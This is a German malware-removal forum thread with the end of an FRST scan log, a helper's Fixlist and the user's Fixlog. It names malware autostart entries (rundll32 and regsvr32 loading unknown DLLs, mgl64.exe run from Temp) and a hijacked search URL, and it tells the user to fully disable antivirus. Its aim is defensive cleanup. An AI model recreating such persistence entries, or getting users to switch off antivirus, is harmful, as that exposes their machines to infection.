2016-11-10 06:35 - 2016-11-02 11:28 - 00411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCenter.dll
2016-11-10 06:35 - 2016-11-02 11:28 - 00321024 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkUXBroker.dll
2016-11-10 06:35 - 2016-11-02 11:28 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.HumanInterfaceDevice.dll
2016-11-10 06:35 - 2016-11-02 11:28 - 00274432 _____ (Microsoft Corporation) C:\WINDOWS\system32\ListSvc.dll
2016-11-10 06:35 - 2016-11-02 11:28 - 00115200 _____ (Microsoft Corporation) C:\WINDOWS\system32\IdCtrls.dll
2016-11-10 06:35 - 2016-11-02 11:28 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2016-11-10 06:35 - 2016-11-02 11:27 - 23677952 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-11-10 06:35 - 2016-11-02 11:27 - 00631296 _____ (Microsoft Corporation) C:\WINDOWS\system32\WlanMediaManager.dll
2016-11-10 06:35 - 2016-11-02 11:27 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2016-11-10 06:35 - 2016-11-02 11:26 - 00579072 _____ (Microsoft Corporation) C:\WINDOWS\system32\ddraw.dll
2016-11-10 06:35 - 2016-11-02 11:26 - 00278016 _____ (Microsoft Corporation) C:\WINDOWS\system32\netplwiz.dll
2016-11-10 06:35 - 2016-11-02 11:24 - 03778560 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-11-10 06:35 - 2016-11-02 11:24 - 00940032 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontext.dll
2016-11-10 06:35 - 2016-11-02 11:23 - 00101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bowser.sys
2016-11-10 06:35 - 2016-11-02 11:22 - 13441024 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-11-10 06:35 - 2016-11-02 11:22 - 13081600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-11-10 06:35 - 2016-11-02 11:22 - 00369664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msinfo32.exe
2016-11-10 06:35 - 2016-11-02 11:21 - 05111296 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2016-11-10 06:35 - 2016-11-02 11:19 - 01586176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2016-11-10 06:35 - 2016-11-02 11:19 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2016-11-10 06:35 - 2016-11-02 11:19 - 00154112 _____ (Microsoft Corporation) C:\WINDOWS\system32\NPSM.dll
2016-11-10 06:35 - 2016-11-02 11:19 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\chartv.dll
2016-11-10 06:35 - 2016-11-02 11:18 - 00991232 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2016-11-10 06:35 - 2016-11-02 11:18 - 00836608 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcRefreshTask.dll
2016-11-10 06:35 - 2016-11-02 11:17 - 00982528 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 03400192 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncCenter.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 02669056 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 01779712 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 01637888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 01490944 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 00770560 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 00629248 _____ (Microsoft Corporation) C:\WINDOWS\system32\hgcpl.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 00579072 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 00308736 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActionCenter.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 00265728 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-11-10 06:35 - 2016-11-02 11:15 - 04708864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2016-11-10 06:35 - 2016-11-02 11:15 - 02611200 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameux.dll
2016-11-10 06:35 - 2016-11-02 11:13 - 00322048 _____ (Microsoft Corporation) C:\WINDOWS\system32\GlobCollationHost.dll
2016-11-10 06:34 - 2016-11-02 12:20 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-11-10 06:34 - 2016-11-02 12:03 - 00714592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2016-11-10 06:34 - 2016-11-02 12:00 - 00534096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2016-11-10 06:34 - 2016-11-02 11:31 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\system32\BcastDVRHelper.dll
2016-11-10 06:34 - 2016-11-02 11:31 - 00170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-11-10 06:34 - 2016-11-02 11:31 - 00159232 _____ (Microsoft Corporation) C:\WINDOWS\system32\ACPBackgroundManagerPolicy.dll
2016-11-10 06:34 - 2016-11-02 11:28 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2016-11-10 06:34 - 2016-11-02 11:27 - 00605184 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-11-10 06:34 - 2016-11-02 11:25 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2016-11-10 06:34 - 2016-11-02 11:23 - 00072704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ErrorDetailsUpdate.dll
2016-11-10 06:34 - 2016-11-02 11:22 - 00337920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-11-10 06:34 - 2016-11-02 11:21 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-11-10 06:34 - 2016-11-02 11:20 - 02273792 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-11-10 06:34 - 2016-11-02 11:20 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ErrorDetails.dll
2016-11-10 06:34 - 2016-11-02 11:18 - 01690112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2016-11-10 06:34 - 2016-11-02 11:17 - 00828416 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2016-11-10 06:34 - 2016-11-02 11:16 - 00881664 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2016-11-09 06:58 - 2016-11-09 06:58 - 00329467 _____ C:\Users\Patrick\Kfz_12181232_06112016173912_1.pdf
2016-11-06 23:21 - 2016-11-06 23:21 - 00000000 _____ C:\m23apdfj.tmp.X
2016-11-06 23:21 - 2014-06-26 14:52 - 00140208 _____ C:\WINDOWS\SysWOW64\bgsresit.dll
2016-11-06 23:21 - 2014-06-26 14:52 - 00137648 _____ C:\WINDOWS\SysWOW64\bgsrespt.dll
2016-11-06 23:21 - 2014-06-26 14:52 - 00136624 _____ C:\WINDOWS\SysWOW64\bgsrespl.dll
2016-11-06 23:21 - 2014-06-26 14:52 - 00133040 _____ C:\WINDOWS\SysWOW64\bgsresda.dll
2016-11-06 23:21 - 2013-08-01 15:11 - 04609928 _____ (SafeNet Inc.) C:\WINDOWS\system32\hasplms.exe
2016-11-06 23:21 - 2013-08-01 15:11 - 04609928 _____ (SafeNet Inc.) C:\WINDOWS\system32\aksllmtp.exe
2016-11-06 23:21 - 2013-08-01 15:11 - 00140736 _____ (SafeNet Inc.) C:\WINDOWS\system32\Drivers\aksfridge.sys
2016-11-06 23:21 - 2013-08-01 15:11 - 00091784 _____ (SafeNet Inc.) C:\WINDOWS\system32\Drivers\aksdf.sys
2016-11-06 23:19 - 2016-11-06 23:19 - 00000000 ____D C:\ProgramData\3D Systems
2016-11-06 18:10 - 2016-11-06 18:10 - 00000000 ____D C:\Users\Patrick\AppData\Roaming\DassaultSystemes
2016-11-06 18:10 - 2016-11-06 18:10 - 00000000 ____D C:\Users\Patrick\AppData\Local\DassaultSystemes
2016-11-06 18:10 - 2016-11-06 18:10 - 00000000 ____D C:\ProgramData\DassaultSystemes
2016-11-06 17:39 - 2014-06-30 13:42 - 07642544 _____ (BroadGun Software Pty Ltd) C:\WINDOWS\SysWOW64\bgsview.exe
2016-11-06 17:39 - 2014-06-26 14:52 - 00142768 _____ C:\WINDOWS\SysWOW64\bgsreses.dll
2016-11-06 17:39 - 2014-06-26 14:52 - 00141232 _____ C:\WINDOWS\SysWOW64\bgsresfr.dll
2016-11-06 17:39 - 2014-06-26 14:52 - 00136112 _____ C:\WINDOWS\SysWOW64\bgsresde.dll
2016-11-06 17:39 - 2014-06-26 14:52 - 00134576 _____ C:\WINDOWS\SysWOW64\bgsresen.dll
2016-11-06 17:39 - 2014-06-26 11:55 - 00474032 _____ (Broadgun Software Pty Ltd) C:\WINDOWS\SysWOW64\bgsofice.dll
2016-11-06 17:39 - 2014-06-26 11:55 - 00269232 _____ (Broadgun Software) C:\WINDOWS\SysWOW64\bgstb.dll
2016-11-06 17:39 - 2014-06-26 11:55 - 00204720 _____ (Broadgun Software) C:\WINDOWS\SysWOW64\bgsmsnd.exe
2016-11-06 17:39 - 2014-06-26 11:55 - 00066480 _____ C:\WINDOWS\system32\bgspm64.dll
2016-11-06 17:39 - 2013-03-17 13:35 - 00439864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSHFLXGD.OCX
2016-11-06 17:39 - 2013-03-17 13:12 - 00646952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OC30.DLL
2016-11-06 17:39 - 2009-03-20 09:03 - 00516832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bgscapi.dll
2016-11-06 17:24 - 2016-11-06 17:26 - 00000000 ____D C:\Users\Patrick\TK
2016-11-06 17:24 - 2016-11-06 17:24 - 00000000 ____D C:\Users\Patrick\DA Direkt
2016-11-05 04:57 - 2016-11-05 04:57 - 00000000 ____D C:\Users\Patrick\AppData\Local\Glassix
2016-11-05 04:57 - 2016-11-05 04:57 - 00000000 ____D C:\Users\Patrick\AppData\Local\Crashpad
2016-11-05 00:26 - 2016-11-05 00:26 - 00000000 ____D C:\Users\Patrick\AppData\LocalLow\TeamNimbus

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-12-03 19:37 - 2016-09-24 17:13 - 00000514 _____ C:\WINDOWS\Tasks\Systemaktualisierung von Yandex Browser.job
2016-12-03 19:37 - 2016-09-24 17:13 - 00000452 _____ C:\WINDOWS\Tasks\Aktualisierung von Yandex Browser.job
2016-12-03 19:37 - 2016-09-24 16:26 - 00000000 ____D C:\ProgramData\NVIDIA
2016-12-03 19:37 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-12-03 19:37 - 2015-12-22 21:42 - 00000000 __SHD C:\Users\Patrick\IntelGraphicsProfiles
2016-12-03 19:34 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2016-12-03 12:55 - 2016-09-24 16:27 - 00000000 ____D C:\Users\Patrick
2016-12-03 12:55 - 2016-09-24 16:25 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2016-12-03 12:03 - 2015-12-23 10:42 - 00000000 ____D C:\Program Files (x86)\Steam
2016-12-03 10:38 - 2016-08-21 15:32 - 00000436 _____ C:\WINDOWS\Tasks\Update for Yandex Browser.job
2016-12-03 10:38 - 2016-07-16 07:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2016-12-03 02:35 - 2016-09-24 17:19 - 00270074 _____ C:\WINDOWS\system32\prfh0804.dat
2016-12-03 02:35 - 2016-09-24 17:19 - 00185476 _____ C:\WINDOWS\system32\prfc0804.dat
2016-12-03 02:35 - 2016-07-16 23:51 - 01016682 _____ C:\WINDOWS\system32\perfh007.dat
2016-12-03 02:35 - 2016-07-16 23:51 - 00239460 _____ C:\WINDOWS\system32\perfc007.dat
2016-12-03 02:35 - 2015-12-22 21:42 - 02917240 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-12-03 02:30 - 2016-09-24 16:35 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-12-03 02:30 - 2016-07-16 07:04 - 00262144 _____ C:\WINDOWS\system32\config\BBI
2016-12-02 23:41 - 2015-12-22 22:34 - 00001374 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-12-02 23:41 - 2015-12-22 21:48 - 00001137 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-12-02 23:26 - 2016-01-10 15:00 - 00000000 ____D C:\Users\Patrick\AppData\LocalLow\SogouPy
2016-12-02 23:13 - 2016-07-08 23:01 - 00000008 __RSH C:\ProgramData\ntuser.pol
2016-12-02 23:13 - 2015-12-22 23:33 - 00000000 ____D C:\Users\Patrick\AppData\Local\CrashDumps
2016-12-02 19:32 - 2015-12-22 21:55 - 00000000 ____D C:\Program Files (x86)\Avira
2016-12-02 19:31 - 2015-12-22 21:55 - 00000000 ____D C:\ProgramData\Package Cache
2016-12-02 19:21 - 2015-12-22 23:34 - 00000000 ____D C:\Users\Patrick\Documents\Tencent Files
2016-12-02 16:25 - 2016-07-16 12:47 - 00000000 ___HD C:\Program Files\WindowsApps
2016-12-02 12:32 - 2015-12-22 21:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-12-01 20:35 - 2015-12-23 12:48 - 00000000 ____D C:\Users\Patrick\Documents\My Games
2016-12-01 20:27 - 2015-12-22 17:15 - 00000000 ____D C:\Users\Patrick\Rechnungen
2016-11-29 06:30 - 2015-12-23 00:36 - 00000000 ____D C:\Games
2016-11-28 02:04 - 2015-12-23 11:29 - 00000000 ____D C:\Users\Patrick\AppData\Roaming\Azureus
2016-11-26 16:44 - 2015-12-23 11:29 - 00001870 _____ C:\Users\Public\Desktop\Vuze.lnk
2016-11-26 16:44 - 2015-12-23 11:29 - 00001870 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vuze.lnk
2016-11-26 16:44 - 2015-12-23 11:29 - 00000000 ____D C:\Program Files\Vuze
2016-11-26 02:34 - 2016-07-16 23:57 - 00000000 ____D C:\Users\Patrick\AppData\Local\JDownloader v2.0
2016-11-26 01:38 - 2016-01-30 17:53 - 00000000 ____D C:\Users\Patrick\AppData\Roaming\RenPy
2016-11-24 21:18 - 2016-01-19 22:14 - 00001534 _____ C:\ProgramData\ss.ini
2016-11-24 21:02 - 2016-07-16 12:45 - 00000000 ____D C:\WINDOWS\INF
2016-11-22 17:47 - 2016-03-19 19:06 - 00000000 ____D C:\Users\Patrick\AppData\Local\MEGAsync
2016-11-22 17:18 - 2016-09-24 17:13 - 00003694 _____ C:\WINDOWS\System32\Tasks\Systemaktualisierung von Yandex Browser
2016-11-19 03:15 - 2016-09-24 16:26 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2016-11-19 03:15 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\Help
2016-11-19 03:14 - 2016-09-24 16:26 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2016-11-19 03:14 - 2016-09-24 16:26 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2016-11-19 03:03 - 2016-09-17 12:44 - 00000946 _____ C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job
2016-11-19 03:02 - 2016-09-24 16:35 - 00002784 _____ C:\WINDOWS\System32\Tasks\klcp_update
2016-11-19 03:02 - 2016-09-24 16:30 - 00001544 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-11-19 03:02 - 2016-08-28 16:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack
2016-11-19 03:02 - 2016-08-28 16:58 - 00000000 ____D C:\Program Files\K-Lite Codec Pack
2016-11-19 02:58 - 2016-09-24 16:35 - 00004086 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2016-11-19 02:58 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2016-11-19 02:58 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2016-11-19 02:58 - 2015-12-22 22:30 - 00000000 ____D C:\Users\Patrick\AppData\Local\Adobe
2016-11-18 22:48 - 2016-02-16 19:53 - 00000000 ____D C:\Users\Patrick\AppData\Local\HiSuite
2016-11-18 14:42 - 2016-10-06 23:00 - 00001492 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2016-11-18 14:42 - 2016-09-24 16:48 - 00004006 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2016-11-18 14:42 - 2016-09-24 16:48 - 00003978 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2016-11-18 14:42 - 2016-09-24 16:48 - 00003942 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2016-11-18 14:42 - 2016-09-24 16:48 - 00003916 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2016-11-18 14:42 - 2016-09-24 16:48 - 00003754 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2016-11-18 14:42 - 2016-09-24 16:48 - 00003712 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2016-11-11 19:30 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\rescache
2016-11-10 19:27 - 2015-12-22 21:39 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-11-10 19:26 - 2016-09-24 16:25 - 00425904 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-11-10 07:18 - 2016-07-16 12:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-11-10 07:18 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-11-10 07:18 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-11-10 07:18 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\system32\migwiz
2016-11-10 07:18 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2016-11-10 07:18 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-11-10 07:14 - 2016-07-16 12:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-11-09 23:02 - 2015-12-22 22:59 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-11-09 23:00 - 2016-10-19 06:16 - 00000000 ____D C:\Program Files (x86)\Cimatron
2016-11-09 22:45 - 2016-08-28 16:12 - 00000000 ____D C:\Users\Patrick\AppData\Roaming\vlc
2016-11-08 22:14 - 2015-12-23 02:16 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-11-08 22:11 - 2015-12-23 02:16 - 141011376 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-11-06 23:44 - 2016-10-19 06:16 - 00000215 _____ C:\WINDOWS\CimLicManager.INI
2016-11-06 23:39 - 2015-12-22 22:33 - 00000000 ____D C:\Users\Patrick\AppData\Local\Google
2016-11-06 23:21 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\system32\setup
2016-11-06 17:39 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\system32\spool
2016-11-06 17:37 - 2016-10-19 06:10 - 00000000 ____D C:\Program Files\Cimatron
2016-11-06 17:22 - 2015-12-22 17:15 - 00000000 ____D C:\Users\Patrick\HUK24
2016-11-04 17:27 - 2015-12-22 23:13 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-12-02 23:06 - 2016-12-02 23:06 - 0000004 _____ () C:\Users\Patrick\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat
2015-08-13 14:41 - 2015-08-13 14:47 - 0047462 ___SH () C:\Users\Patrick\AppData\Roaming\d3dx10.exe
2016-05-10 19:35 - 2016-05-10 19:40 - 0000009 _____ () C:\Users\Patrick\AppData\Roaming\update.dat
2016-05-10 19:36 - 2016-05-10 19:36 - 0000004 _____ () C:\Users\Patrick\AppData\Roaming\Microsoft\notaut.txt
2015-12-31 01:56 - 2016-01-04 00:01 - 0007605 _____ () C:\Users\Patrick\AppData\Local\Resmon.ResmonCfg
2016-09-24 16:26 - 2016-09-24 16:26 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2016-01-19 22:14 - 2016-11-24 21:18 - 0001534 _____ () C:\ProgramData\ss.ini

Dateien, die verschoben oder gelöscht werden sollten:
====================
C:\Windows\Temp\mgl64.exe
C:\Users\Patrick\cc_20161001_142046.reg


Einige Dateien in TEMP:
====================
C:\Users\Jia\AppData\Local\Temp\avgnt.exe


==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-11-25 20:55

==================== Ende von FRST.txt ============================

cosinus 03.12.2016 20:15
FRST-Fix

Virenscanner jetzt bitte komplett deaktivieren, damit sichergestellt ist, dass der Fix sauber durchläuft!

Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:
closeprocesses:
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [{71257112-2DEC-B5C4-6C86-88509071DF29}] => C:\Windows\Temp\mgl64.exe [335360 2016-12-03] (      Ghisler          Software  GmbH) <===== ACHTUNG
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [Idhsoft] => C:\Users\Patrick\AppData\Local\Idhsoft\mgl64.exe [335360 2016-12-02] (      Ghisler          Software  GmbH)
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [Akworks] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Patrick\AppData\Local\Idhsoft\sbdzoqlr.dll
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\MountPoints2: {19b79380-b27e-11e6-9858-201a06114318} - "G:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\MountPoints2: {ca47ee10-8280-11e6-9848-201a06114318} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\MountPoints2: {d8aa2e3c-7f52-11e6-983e-201a06114318} - "G:\HiSuiteDownLoader.exe"
HKU\S-1-5-18\...\Run: [huuigl] => rundll32.exe "C:\WINDOWS\system32\config\systemprofile\AppData\Local\huuigl.dll",huuigl <===== ACHTUNG
FF Extension: (Avira Browser Safety) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\abs@avira.com.xpi [2016-11-21]
FF Extension: (Add to Search Bar) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\add-to-searchbox@maltekraus.de.xpi [2016-01-20]
FF Plugin-x32: @qq.com/npchrome -> C:\Program Files (x86)\Common Files\Tencent\Npchrome\npchrome.dll [Keine Datei]
CHR DefaultSearchURL: Default -> hxxp://feed.mountainbrowse.com/?fext=true&publisherid=51623&publisher=mountext&st=et&q={searchTerms}
CHR DefaultSearchKeyword: Default -> Mount
S2 bespakduct; C:\WINDOWS\system32\config\systemprofile\AppData\Local\Quoteelectrics.exe [4608 2016-12-02] () [Datei ist nicht signiert]
R2 BitTorrent; C:\Program Files\BitTorrent\BitTorrent.exe [312320 2016-11-06] () [Datei ist nicht signiert] <==== ACHTUNG
C:\Program Files (x86)\Avira
C:\WINDOWS\System32\Tasks\{6BA690B0-1A65-4FE1-B843-96EDE2B0A4C7}
C:\WINDOWS\eiunin21.exe
C:\Users\Patrick\AppData\Roaming\d3dx10.exe
C:\m23apdfj.tmp.X
C:\Users\Patrick\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat
C:\Program Files\BitTorrent
C:\WINDOWS\system32\config\systemprofile\AppData\Local\Quoteelectrics.exe
C:\Program Files (x86)\Common Files\Tencent
C:\WINDOWS\system32\config\systemprofile\AppData\Local\huuigl.dll
G:\HiSuiteDownLoader.exe
E:\HiSuiteDownLoader.exe
G:\HiSuiteDownLoader.exe
C:\Windows\Temp\netstream.exe
C:\Windows\Temp\mgl64.exe
C:\Users\Patrick\AppData\Local\Idhsoft
C:\Users\Patrick\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat
C:\Users\Patrick\AppData\Roaming\d3dx10.exe
C:\Users\Patrick\AppData\Roaming\update.dat
cmd: type C:\Users\Patrick\AppData\Roaming\Microsoft\notaut.txt
cmd: dir /oge-d "C:\Users\Patrick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
cmd: dir /oge-d "%APPDATA%"
cmd: dir /oge-d "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
cmd: dir /oge-d "%PROGRAMDATA%"
emptytemp:

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
  • Starte nun FRST erneut und klicke den Entfernen Button.
  • Das Tool erstellt eine Fixlog.txt.
  • Poste mir deren Inhalt.


Machalla666 03.12.2016 20:24
FRST hat alle offenen Fenster geschlossen und den Laptop am ende des Vorgangs neugestartet.
Hier das Fixlog.txt:

Code:
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 02-12-2016
durchgeführt von Patrick (03-12-2016 20:22:05) Run:1
Gestartet von C:\Users\Patrick\Desktop
Geladene Profile: Patrick (Verfügbare Profile: Patrick)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
closeprocesses:
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [{71257112-2DEC-B5C4-6C86-88509071DF29}] => C:\Windows\Temp\mgl64.exe [335360 2016-12-03] (      Ghisler          Software  GmbH) <===== ACHTUNG
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [Idhsoft] => C:\Users\Patrick\AppData\Local\Idhsoft\mgl64.exe [335360 2016-12-02] (      Ghisler          Software  GmbH)
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [Akworks] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Patrick\AppData\Local\Idhsoft\sbdzoqlr.dll
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\MountPoints2: {19b79380-b27e-11e6-9858-201a06114318} - "G:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\MountPoints2: {ca47ee10-8280-11e6-9848-201a06114318} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\MountPoints2: {d8aa2e3c-7f52-11e6-983e-201a06114318} - "G:\HiSuiteDownLoader.exe"
HKU\S-1-5-18\...\Run: [huuigl] => rundll32.exe "C:\WINDOWS\system32\config\systemprofile\AppData\Local\huuigl.dll",huuigl <===== ACHTUNG
FF Extension: (Avira Browser Safety) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\abs@avira.com.xpi [2016-11-21]
FF Extension: (Add to Search Bar) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\add-to-searchbox@maltekraus.de.xpi [2016-01-20]
